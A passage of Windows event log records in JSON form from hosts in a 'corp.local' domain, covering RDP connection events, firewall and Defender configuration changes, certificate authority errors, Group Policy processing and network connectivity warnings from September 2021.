module","Opcode":"Runtime","ClientMode":"2","AvcEnabled":"0","ProfileIdNum":"2","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.874108+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.495389+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":100,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23815,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1332,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The server has confirmed that the client's multi-transport capability.","Category":"RemoteFX module","Opcode":"EstablishConnection","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.685235+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":169,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23824,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1484,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The client operating system type is (6, 0). Server: IT01","Category":"RemoteFX module","Opcode":"Runtime","MajorType":"6","MinorType":"0","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.874108+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:29:22.424178+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2003,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11590,"ExecutionProcessID":1552,"ExecutionThreadID":5832,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A Windows Defender Firewall setting in the Public profile has changed.\r\nNew Setting:\r\n\tType:\tEnable Windows Defender Firewall\r\n\tValue:\tYes\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\Windows\\System32\\SecurityHealthService.exe","Opcode":"Info","Profiles":"4","SettingType":"1","SettingValueSize":"4","SettingValue":"01000000","SettingValueString":"Yes","Origin":"1","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\Windows\\System32\\SecurityHealthService.exe","EventReceivedTime":"2021-09-21T14:23:59.452234+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.392635+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":101,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":16,"RecordNumber":23803,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1484,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The network characteristics detection function has been disabled because of Reason Code: 2(Server Configuration)..","Category":"RemoteFX module","Opcode":"NetworkDetect","ReasonString":"Reason Code: 2(Server Configuration).","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.393161+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":71,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23809,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The connection RDP-Tcp#7 uses display driver RDPUDD.","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","DisplayDriverName":"RDPUDD","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:59.052279+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":168,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23845,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3768,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The resolution requested by the client: Monitor 0: (2880, 1800), origin: (0, 0). Server: IT01","Category":"RemoteFX module","Opcode":"Initialize","MonitorNum":"0","MonitorWidth":"2880","MonitorHeight":"1800","MonitorX":"0","MonitorY":"0","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.967860+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:29:22.424241+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4950,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":4046613,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":2716,"Channel":"Security","Message":"A Windows Firewall setting was changed.\r\n\t\r\nChanged Profile:\tPublic\r\n\r\nNew Setting:\r\n\tType:\tEnable Windows Defender Firewall\r\n\tValue:\tYes","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"Public","SettingType":"Enable Windows Defender Firewall","SettingValue":"Yes","EventReceivedTime":"2021-09-21T14:23:59.452234+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.603471+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":228,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23867,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Disconnect trace:'calling spGfxPlugin->PreDisconnect()' in CUMRDPConnection::PreDisconnect at 4719 err=[0xc]","Category":"RemoteFX module","Opcode":"Runtime","ComponentName":"CUMRDPConnection","ErrorCode":"12","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:19:43.129626+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":6041,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":75441,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A CredSSP authentication to TERMSRV/192.168.2.47 failed to negotiate a common protocol version. The remote host offered version 3 which is not permitted by Encryption Oracle Remediation.\r\n\r\nSee https://go.microsoft.com/fwlink/?linkid=866660 for more information.","Opcode":"Info","Data":"TERMSRV/192.168.2.47","Data_1":"3","EventReceivedTime":"2021-09-15T11:19:43.442226+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:19:52.786785+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4692,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13314,"OpcodeValue":0,"RecordNumber":190631694,"ExecutionProcessID":492,"ExecutionThreadID":1344,"Channel":"Security","Message":"Backup of data protection master key was attempted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1112\r\n\tAccount Name:\t\tLucy\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x14D52A9E\r\n\r\nKey Information:\r\n\tKey Identifier:\te1327e5a-b8c2-4750-9140-bd85abc8e7ef\r\n\tRecovery Server:\t\r\n\tRecovery Key ID:\tfdb4b563-caa2-4306-91d4-ceccc90f4b95\r\n\r\nStatus Information:\r\n\tStatus Code:\t0x0","Category":"DPAPI Activity","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1112","SubjectUserName":"Lucy","SubjectDomainName":"CORP","SubjectLogonId":"0x14d52a9e","MasterKeyId":"e1327e5a-b8c2-4750-9140-bd85abc8e7ef","RecoveryKeyId":"fdb4b563-caa2-4306-91d4-ceccc90f4b95","FailureReason":"0x0","EventReceivedTime":"2021-09-15T11:19:54.458681+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:54:56.372339+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28115,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28141,"OpcodeValue":0,"RecordNumber":7575,"ExecutionProcessID":4488,"ExecutionThreadID":3124,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Shortcut for application Wireshark with ID {6D809377-6AF0-444B-8957-A3773F02200E}\\Wireshark\\Wireshark.exe and flags 0x8030 is added to app resolver cache.","Opcode":"Info","Name":"Wireshark","AppID":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Wireshark\\Wireshark.exe","Flags":"32816","EventReceivedTime":"2021-09-15T11:54:57.792859+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:06.083287+05:45","Hostname":"DC01.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28116,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28142,"OpcodeValue":0,"RecordNumber":12648,"ExecutionProcessID":5388,"ExecutionThreadID":1580,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Lucy","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1112","AccountType":"User","Message":"Shortcut for application Certification Authority with ID {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\certsrv.msc and flags 0x38 is removed from app resolver cache.","Opcode":"Info","Name":"Certification Authority","AppID":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\certsrv.msc","Flags":"56","EventReceivedTime":"2021-09-15T11:20:06.848961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:06.286474+05:45","Hostname":"DC01.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28123,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28135,"OpcodeValue":0,"RecordNumber":12650,"ExecutionProcessID":5388,"ExecutionThreadID":1580,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Lucy","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1112","AccountType":"User","Message":"Updated start screen layout: 65 items initially; 2 added; 2 removed; 2 updated. Cache contains 2 applications.","Opcode":"Info","ItemsExisting":"65","ItemsAdded":"2","ItemsRemoved":"2","ItemsUpdated":"2","ItemsCached":"65","EventReceivedTime":"2021-09-15T11:20:06.848961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:36.234040+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1530,"SourceName":"Microsoft-Windows-User Profiles Service","ProviderGuid":"{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119227,"ExecutionProcessID":880,"ExecutionThreadID":6012,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards. No user action is required. \r\n\r\n DETAIL - \r\n 1 user registry handles leaked from \\Registry\\User\\S-1-5-21-2569713578-3403938347-3732993993-1112:\nProcess 880 (\\Device\\HarddiskVolume2\\Windows\\System32\\svchost.exe) has opened key \\REGISTRY\\USER\\S-1-5-21-2569713578-3403938347-3732993993-1112\n","Opcode":"Info","Detail":"1 user registry handles leaked from \\Registry\\User\\S-1-5-21-2569713578-3403938347-3732993993-1112:\nProcess 880 (\\Device\\HarddiskVolume2\\Windows\\System32\\svchost.exe) has opened key \\REGISTRY\\USER\\S-1-5-21-2569713578-3403938347-3732993993-1112\n","EventReceivedTime":"2021-09-15T11:20:37.155829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:36.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9009,"SourceName":"Desktop Window Manager","TaskValue":0,"RecordNumber":119229,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Desktop Window Manager has exited with code (0xd00002fe)","EventData":"<Data>0xd00002fe</Data>","EventReceivedTime":"2021-09-15T11:20:37.155829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:54:56.215179+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1076,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":107580,"ExecutionProcessID":3032,"ExecutionThreadID":1092,"Channel":"System","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"The reason supplied by user IT03\\Administrator for the last unexpected shutdown of this computer is: Other (Unplanned)\r\n Reason Code: 0xa000000\r\n Problem ID: \r\n Bugcheck String: \r\n Comment: \n","param1":"Other (Unplanned)","param2":"0xa000000","param5":"\n","param6":"IT03\\Administrator","EventReceivedTime":"2021-09-15T11:54:56.777626+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:55:13.605493+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":407,"ExecutionProcessID":6288,"ExecutionThreadID":6292,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Process '\\Device\\HarddiskVolume2\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\83.238.200\\software_reporter_tool.exe' (PID 6288) was blocked from making system calls to Win32k.sys.","Opcode":"Info","ProcessPathLength":"130","ProcessPath":"\\Device\\HarddiskVolume2\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\83.238.200\\software_reporter_tool.exe","ProcessCommandLineLength":"340","ProcessCommandLine":"\"c:\\users\\administrator\\appdata\\local\\google\\chrome\\user data\\swreporter\\83.238.200\\software_reporter_tool.exe\" --enable-crash-reporting --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_5036_YDTKZHYDCWQGEOBR\" --sandboxed-process-id=3 --init-done-notifier=1040 --sandbox-mojo-pipe-token=13523599040654431274 --mojo-platform-channel-handle=1036","CallingProcessId":"6288","CallingProcessCreateTime":"2021-09-15T06:10:13.543692100Z","CallingProcessStartKey":"12384898975269366","CallingProcessSignatureLevel":"0","CallingProcessSectionSignatureLevel":"0","CallingProcessProtection":"0","CallingThreadId":"6292","CallingThreadCreateTime":"2021-09-15T06:10:13.543696100Z","EventReceivedTime":"2021-09-15T11:55:15.587670+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:42:58.535250+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5004,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22140,"ExecutionProcessID":3468,"ExecutionThreadID":4088,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection feature configuration has changed.\r\n \tFeature: Network Inspection System\r\n \tConfiguration: 0","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Feature Name":"Network Inspection System","Configuration":"0","Feature ID":"9","EventReceivedTime":"2021-09-14T10:43:00.026328+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:43:22.841945+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2014,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22145,"ExecutionProcessID":2080,"ExecutionThreadID":1072,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus platform update to 4.18.2108.7 has succeeded.\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","EventReceivedTime":"2021-09-14T10:43:25.354955+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:56:20.880695+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":94,"SourceName":"Microsoft-Windows-CertificationAuthority","ProviderGuid":"{6A71D062-9AFE-4F35-AD08-52134F85DFB9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":28170,"ExecutionProcessID":2448,"ExecutionThreadID":2452,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Active Directory Certificate Services CORP-IT03-CA can not open the certificate store at CN=NTAuthCertificates,CN=Public Key Services,CN=Services in the Active Directory's configuration container.","Opcode":"Info","CACommonName":"CORP-IT03-CA","EventReceivedTime":"2021-09-14T10:56:43.675112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:56:17.839910+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":91,"SourceName":"Microsoft-Windows-CertificationAuthority","ProviderGuid":"{6A71D062-9AFE-4F35-AD08-52134F85DFB9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":28169,"ExecutionProcessID":2448,"ExecutionThreadID":2452,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Could not connect to the Active Directory. Active Directory Certificate Services will retry when processing requires Active Directory access.","Opcode":"Info","EventReceivedTime":"2021-09-14T10:56:43.675112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:55:57.837505+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7042,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":107272,"ExecutionProcessID":612,"ExecutionThreadID":608,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The lmhosts service was successfully sent a stop control.\r\n\r\n The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]\r\n\r\n Comment: None","param1":"lmhosts","param2":"stop","param3":"0x40030011","param4":"Operating System: Network Connectivity (Planned)","param5":"None","EventReceivedTime":"2021-09-14T10:56:47.225759+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.063673+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1502,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":107337,"ActivityID":"{F3A314BA-5BC6-4EE0-B4B4-70668B78E353}","ExecutionProcessID":1520,"ExecutionThreadID":4308,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Group Policy settings for the computer were processed successfully. New settings from 8 Group Policy objects were detected and applied.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4213","ProcessingMode":"1","ProcessingTimeInMilliseconds":"48437","DCName":"\\\\DC01.corp.local","NumberOfGroupPolicyObjects":"8","EventReceivedTime":"2021-09-14T10:57:26.155003+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.558419+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4954,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":40710496,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":2204,"Channel":"Security","Message":"Group Policy settings for Windows Firewall were changed, and the new settings were applied.","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-14T10:57:26.186262+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.557640+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2008,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4024,"ExecutionProcessID":1404,"ExecutionThreadID":1812,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Windows Defender Firewall Group Policy settings have changed. The new settings have been applied","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-14T10:57:27.280452+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T15:32:33.713341+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":47,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":644979,"ExecutionProcessID":940,"ExecutionThreadID":384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Time Provider NtpClient: No valid response has been received from manually configured peer 1.uk.pool.ntp.org,0x1 after 8 attempts to contact it. This peer will be discarded as a time source and NtpClient will attempt to discover a new peer with this DNS name. The error was: The peer is unreachable. ","Opcode":"Info","ManualPeer":"1.uk.pool.ntp.org,0x1","ErrorMessage":"The peer is unreachable. ","EventReceivedTime":"2021-09-14T15:32:34.822781+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":30807,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1285,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The connection to the share was lost.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nShare name: \\winserver2019\\IPC$\r\nSession ID: 0xA40000000035\r\nTree ID: 0x1\r\n\r\nGuidance:\r\nIf the server is a Windows Failover Cluster file server, then this message occurs when the file share moves between cluster nodes. There should also be an anti-event 30808 indicating the session to the server was re-established. If the server is not a failover cluster, it is likely that the server was previously online, but it is now inaccessible over the network.","Opcode":"Info","Status":"3221225996","SessionId":"180319906955317","TreeId":"1","ServerNameLength":"19","ServerName":"\\winserver2019\\IPC$","AddressLength":"0","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30804,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1283,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The network connection failed.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nServer name: \\winserver2019\r\nServer address: 192.168.2.108:445\r\nConnection type: Wsk\r\n\r\nGuidance:\r\nThis indicates a problem with the underlying network or transport, such as with TCP/IP, and not with SMB. A firewall that blocks port 445 or 5445 can also cause this issue.","Opcode":"Info","Reason":"7","Status":"3221225996","ServerNameLength":"14","ServerName":"\\winserver2019","AddressLength":"16","Address":"020001BDC0A8026C0000000000000000","ConnectionType":"1","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
